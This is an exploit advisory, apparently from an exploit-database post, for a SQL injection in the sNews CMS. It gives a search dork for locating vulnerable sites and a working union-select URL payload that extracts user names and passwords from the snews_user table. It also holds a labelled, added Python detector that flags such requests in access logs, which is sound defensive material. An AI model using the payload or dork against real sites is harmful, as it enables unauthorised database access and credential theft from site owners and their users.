Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL PoC:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
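
A detection check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for `act=shownews` requests whose `id` is not a plain integer, undoing URL encoding and the `/**/` comment padding before looking for `union select`. The log lines are constructed, and the rule that a legitimate `id` is a non-negative integer is an assumption not stated on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # closed or unterminated /* ... */
UNION = re.compile(r"union\s+(?:all\s+)?select\b")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Turn SQL comments into spaces, collapse whitespace, lowercase."""
    return " ".join(COMMENT.sub(" ", value).split()).lower()

def classify_id(url):
    """None if not a shownews request, else 'ok', 'union-select' or 'non-numeric'."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    if not parts.path.endswith("/snews.php") or "shownews" not in query.get("act", []):
        return None
    ids = query.get("id", [""])
    # Assumption: a legitimate article id is a plain non-negative integer.
    if all(re.fullmatch(r"[0-9]+", v) for v in ids):
        return "ok"
    if any(UNION.search(normalize(v)) for v in ids):
        return "union-select"
    return "non-numeric"

def scan(lines):
    """Return (line_number, verdict) for every suspicious shownews request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        verdict = classify_id(m.group(1)) if m else None
        if verdict not in (None, "ok"):
            hits.append((n, verdict))
    return hits

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,2/* HTTP/1.1" 200 5342',
    '198.51.100.7 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=-23%20UNION%20SELECT%200,1,2 HTTP/1.1" 200 5342',
    '203.0.113.9 - - [01/Jan/2013:10:01:00 +0000] "GET /snews/snews.php?act=shownews&id=23%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2013:10:01:02 +0000] "GET /index.php?id=abc HTTP/1.1" 404 120',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```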

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
special my hunny :*